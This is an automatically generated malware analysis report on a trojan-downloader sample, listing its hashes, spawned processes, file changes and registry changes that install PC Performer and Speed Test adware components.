Trojan.Win32.IEDummy_ac0a46831c

by malwarelabrobot on August 10th, 2014 in Malware Descriptions.

Trojan-Downloader.Win32.Genome.hurb (Kaspersky), Trojan.Win32.IEDummy.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: ac0a46831c9c3cbc19e898321a86f789
SHA1: c44a8c9ed046da8e731938248b38a5ddd88f3d3c
SHA256: c0db83d5f0d6ba74780777d67bf813b7c891649e12631e369fb248e53190c4c0
SSDeep: 3072:nUc061qnIgiFwmg7y7CJowrIZFoiSkqXFrX1I lCF:r0agTJowrEWLI cF
Size: 99254 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2011-07-06 17:31:19
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

install_helper_FF.exe:500
taskkill.exe:1964
taskkill.exe:1240
taskkill.exe:776
BackgroundHost.exe:2036
PCPerformerSetup.tmp:548
%original file name%.exe:396
PCPerformerSetup.exe:284
PCPerformer.exe:476
SpeedTest.exe:1220
regsvr32.exe:788
regsvr32.exe:1272
regsvr32.exe:1432
install_helper_IE.exe:604
speedtest187.exe:356

The Trojan injects its code into the following process(es):

BackgroundHost.exe:1300

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process install_helper_FF.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\settings.json (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon16.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon24.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\jquery-1.9.1.min.js (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon18.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon18.ico (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon128.ico (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\install.rdf (987 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon16.ico (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\options.xul (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\rjs.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon48.ico (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon64.ico (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon64.png (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\skin\framework.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\config.js (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon128.png (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\subscriptloader.js (547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\content.js (66 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\icon.png (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\button.js (491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.js (1256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon32.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.xul (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon24.ico (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\background.html (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\framework.png (973 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome.manifest (320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon32.ico (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\icon48.png (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp\chrome\content\button.xml (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ffe6.tmp (0 bytes)

The process BackgroundHost.exe:1300 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\index.dat (0 bytes)

The process PCPerformerSetup.tmp:548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\PC Performer\is-TI75V.tmp (673 bytes)
%Program Files%\PC Performer\unins000.dat (9720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\PC Performer\is-FK08C.tmp (32429 bytes)
%Program Files%\PC Performer\is-LO644.tmp (601 bytes)
%Program Files%\PC Performer\is-0MQOJ.tmp (601 bytes)
%System%\roboot.exe (17 bytes)
%Program Files%\PC Performer\is-88KFP.tmp (10177 bytes)
%Program Files%\PC Performer\is-OR8M6.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\PC Performer\Uninstall PC Performer.lnk (722 bytes)
%Program Files%\PC Performer\is-RFK2G.tmp (601 bytes)
%Program Files%\PC Performer\is-J0TH5.tmp (673 bytes)
%Program Files%\PC Performer\is-CLLEA.tmp (601 bytes)
%Program Files%\PC Performer\is-DRJ95.tmp (673 bytes)
%Program Files%\PC Performer\is-US574.tmp (601 bytes)
%Program Files%\PC Performer\is-ET5QL.tmp (601 bytes)
%Program Files%\PC Performer\is-E9OU8.tmp (54184 bytes)
%Program Files%\PC Performer\is-KJP91.tmp (601 bytes)
%Program Files%\PC Performer\is-LDHVJ.tmp (601 bytes)
%Program Files%\PC Performer\is-6F8RF.tmp (46 bytes)
%Program Files%\PC Performer\is-UQFA0.tmp (601 bytes)
%Program Files%\PC Performer\is-EIDVD.tmp (601 bytes)
%Program Files%\PC Performer\is-R0INF.tmp (45 bytes)
%Program Files%\PC Performer\is-JH9KP.tmp (601 bytes)
%Documents and Settings%\All Users\Desktop\PC Performer.lnk (725 bytes)
%Program Files%\PC Performer\unins000.msg (302 bytes)
%Program Files%\PC Performer\is-O468T.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\PC Performer\PC Performer.lnk (737 bytes)
%Program Files%\PC Performer\is-5Q9FR.tmp (601 bytes)
%Program Files%\PC Performer\is-T36CQ.tmp (601 bytes)
%Program Files%\PC Performer\is-0S898.tmp (601 bytes)
%Program Files%\PC Performer\is-QUT18.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\roboot.exe (17 bytes)
%Program Files%\PC Performer\is-UG752.tmp (57 bytes)
%Program Files%\PC Performer\is-3J2TL.tmp (601 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\roboot.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I78HR.tmp\_isetup (0 bytes)

The process %original file name%.exe:396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\Hash_HMAC.dll (2218 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\StdUtils.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\speedtest187Setup[1].exe (122458 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\PCPerformerSetup.exe (201724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\PCPerformerSetup_genericv3[1].exe (201724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\country[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
C:\END (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\domain.txt (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\country.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\SpeedTest.exe (122458 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\Hash_HMAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\domain.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\PCP SpeedTest_187\country.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (0 bytes)

The process PCPerformerSetup.exe:284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-D10K8.tmp\PCPerformerSetup.tmp (7386 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-D10K8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-D10K8.tmp\PCPerformerSetup.tmp (0 bytes)

The process PCPerformer.exe:476 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\PC Performer_UPDATES.job (268 bytes)
%WinDir%\Tasks\PC Performer_DEFAULT.job (260 bytes)
%Documents and Settings%\%current user%\Application Data\PerformerSoft\PC Performer\log_08-09-2014.log (8116 bytes)
%Documents and Settings%\%current user%\Application Data\PerformerSoft\PC Performer\eng_rcp.dat (3172 bytes)

The process SpeedTest.exe:1220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\bin\DeskTopIcon.ico (16 bytes)
%Program Files%\Speed Test 187\speedtest187.ico (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.exe (71964 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.xpi (9544 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\DeskTopIcon.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper.exe (53430 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper_FF.exe (6841 bytes)
%Documents and Settings%\%current user%\Desktop\Speed Test.lnk (1 bytes)
%Program Files%\Speed Test 187\uninstall_nsis.exe (740 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\speedtest187.crx (8658 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\speedtest187\install_helper_IE.exe (6841 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp (0 bytes)

The process speedtest187.exe:356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Speed Test 187\config.xml (1 bytes)
%Program Files%\Speed Test 187\icon32.png (3 bytes)
%Program Files%\Speed Test 187\AddonsFramework.Typelib64.dll (548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\UAC.dll (13 bytes)
%Program Files%\Speed Test 187\options.htm (780 bytes)
%Program Files%\Speed Test 187\icon24.png (2 bytes)
%Program Files%\Speed Test 187\icon48.ico (25 bytes)
%Program Files%\Speed Test 187\ButtonSite.dll (7938 bytes)
%Program Files%\Speed Test 187\json2.min.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\ie9install.bmp (2712 bytes)
%Program Files%\Speed Test 187\content.js (66 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\help_page.ini (1537 bytes)
%Program Files%\Speed Test 187\jquery-1.9.1.min.js (2410 bytes)
%Program Files%\Speed Test 187\icon24.ico (2 bytes)
%Program Files%\Speed Test 187\icon16.png (1 bytes)
%Program Files%\Speed Test 187\icon64.ico (25 bytes)
%Program Files%\Speed Test 187\background.html (939 bytes)
%Program Files%\Speed Test 187\uninstall.exe (794 bytes)
%Program Files%\Speed Test 187\icon32.ico (10 bytes)
%Program Files%\Speed Test 187\icon16.ico (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\System.dll (11 bytes)
%Program Files%\Speed Test 187\icon128.png (647 bytes)
%Program Files%\Speed Test 187\icon128.ico (25 bytes)
%Program Files%\Speed Test 187\ButtonSite64.dll (10790 bytes)
%Program Files%\Speed Test 187\updater.js (3 bytes)
%Program Files%\Speed Test 187\AddonsFramework.Typelib.dll (2128 bytes)
%Program Files%\Speed Test 187\BackgroundHost.exe (15235 bytes)
%Program Files%\Speed Test 187\BackgroundHost64.exe (15445 bytes)
%Program Files%\Speed Test 187\icon18.png (1 bytes)
%Program Files%\Speed Test 187\rjs.js (1 bytes)
%Program Files%\Speed Test 187\icon64.png (7 bytes)
%Program Files%\Speed Test 187\ScriptHost64.dll (10843 bytes)
%Program Files%\Speed Test 187\button.js (491 bytes)
%Program Files%\Speed Test 187\icon48.png (5 bytes)
%Program Files%\Speed Test 187\ScriptHost.dll (9711 bytes)
%Program Files%\Speed Test 187\updaterWrapper.js (2 bytes)
%Program Files%\Speed Test 187\icon18.ico (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\help_page.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk5.tmp\ie9install.bmp (0 bytes)

Registry activity

The process install_helper_FF.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 E9 41 84 4C 60 95 C6 A4 2C 03 94 02 A5 DC E6"

[HKCU\Software\Mozilla\Firefox\Extensions]
"speedtest187@SpeedTest" = "C:\Documents\speedtest187@SpeedTest"

The process taskkill.exe:1964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 D7 36 8E 13 71 C3 5B C4 6D 48 09 07 4F 42 C3"

The process taskkill.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 68 B1 75 3E 2F 77 8A F1 BA 20 41 9E EE AE 63"

The process taskkill.exe:776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 4F 0E 55 A3 41 A8 56 51 C1 45 77 F8 A0 70 0B"

The process BackgroundHost.exe:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{D058E340-4C95-4A15-A69F-8EE1AEE76E96}\ProgID]
"(Default)" = "Speed Test 187.BackgroundHostObject.1"

[HKCR\AppID\BackgroundHost.EXE]
"AppID" = "{18B9B16E-716F-43DF-A6AD-512C7D2EB983}"

[HKCR\Speed Test 187.BackgroundHostObject.1\CLSID]
"(Default)" = "{D058E340-4C95-4A15-A69F-8EE1AEE76E96}"

[HKCR\CLSID\{D058E340-4C95-4A15-A69F-8EE1AEE76E96}\VersionIndependentProgID]
"(Default)" = "Speed Test 187.BackgroundHostObject"

[HKCR\CLSID\{D058E340-4C95-4A15-A69F-8EE1AEE76E96}\LocalServer32]
"(Default)" = "%Program Files%\Speed Test 187\BackgroundHost.exe"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD2AF093-42BC-4bde-93F4-07F4C3169D76}]
"AppPath" = "%Program Files%\Speed Test 187"

[HKCR\Speed Test 187.BackgroundHostObject.1]
"(Default)" = "BackgroundHostObject Class"

[HKCR\CLSID\{D058E340-4C95-4A15-A69F-8EE1AEE76E96}]
"(Default)" = "BackgroundHostObject Class"

[HKCR\Speed Test 187.BackgroundHostObject]
"(Default)" = "BackgroundHostObject Class"

[HKCR\CLSID\{D058E340-4C95-4A15-A69F-8EE1AEE76E96}\TypeLib]
"(Default)" = "{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}"

[HKCR\Speed Test 187.BackgroundHostObject\CLSID]
"(Default)" = "{D058E340-4C95-4A15-A69F-8EE1AEE76E96}"

[HKCU\Software\Speed Test 187]
"elevationPolicyGuid" = "{DD2AF093-42BC-4bde-93F4-07F4C3169D76}"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\TypeLib]
"(Default)" = "{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}"

[HKCR\Speed Test 187.BackgroundHostObject\CurVer]
"(Default)" = "Speed Test 187.BackgroundHostObject.1"

[HKCR\AppID\{18B9B16E-716F-43DF-A6AD-512C7D2EB983}]
"(Default)" = "BackgroundHost"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}\1.0\0\win32]
"(Default)" = "%Program Files%\Speed Test 187\BackgroundHost.exe"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD2AF093-42BC-4bde-93F4-07F4C3169D76}]
"AppName" = "BackgroundHost.exe"

[HKCR\TypeLib\{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Speed Test 187"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 64 1B 7E 02 CD 39 22 9F F9 18 12 9B 5D B7 52"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD2AF093-42BC-4bde-93F4-07F4C3169D76}]
"Policy" = "3"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}]
"(Default)" = "IBackgroundHost"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}\1.0]
"(Default)" = "BackgroundHost 1.0 Type Library"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_MOVESIZECHILD]
"BackgroundHost.exe" = "1"

[HKCR\TypeLib\{0471A919-4EC9-4BA1-BA53-5490B91EC7DD}\1.0\FLAGS]
"(Default)" = "0"

The process BackgroundHost.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080920140810]
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080920140810]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014080920140810\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080920140810]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080920140810]
"CacheRepair" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 C1 59 21 D9 B6 34 EB 48 2D E0 AF B8 4C F4 8A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080920140810]
"CachePrefix" = ":2014080920140810:"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014041520140416]

The process PCPerformerSetup.tmp:548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\PerformerSoft\PC Performer]
"StartAutoTutorial" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"Inno Setup: Setup Version" = "5.5.2 (u)"

[HKCU\Software\PerformerSoft\PC Performer]
"StartAutoScanOnLaunch" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"Inno Setup: User" = "%CurrentUserName%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"Inno Setup: App Path" = "%Program Files%\PC Performer"
"Publisher" = "PerformerSoft LLC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\PerformerSoft\PC Performer]
"StartAutoScanPMUI" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"InstallDate" = "20140809"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"MinorVersion" = "10"

[HKCU\Software\PerformerSoft\PC Performer]
"TrialType" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"DisplayIcon" = "%Program Files%\PC Performer\PCPerformer.exe"
"HelpLink" = "http://www.Performersoft.com/"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"QuietUninstallString" = "%Program Files%\PC Performer\unins000.exe /SILENT"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\PerformerSoft\PC Performer\LANG]
"LangID" = "0"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"MaxFixLimit" = "100"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"DisplayName" = "PC Performer"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"TELNO" = "(800) 871-7907"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"URLInfoAbout" = "http://www.Performersoft.com/"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"InstallLocation" = "%Program Files%\PC Performer\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"Inno Setup: Icon Group" = "PC Performer"
"UninstallString" = "%Program Files%\PC Performer\unins000.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"Inno Setup: Language" = "en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\PerformerSoft\PC Performer\LANG]
"LangID" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
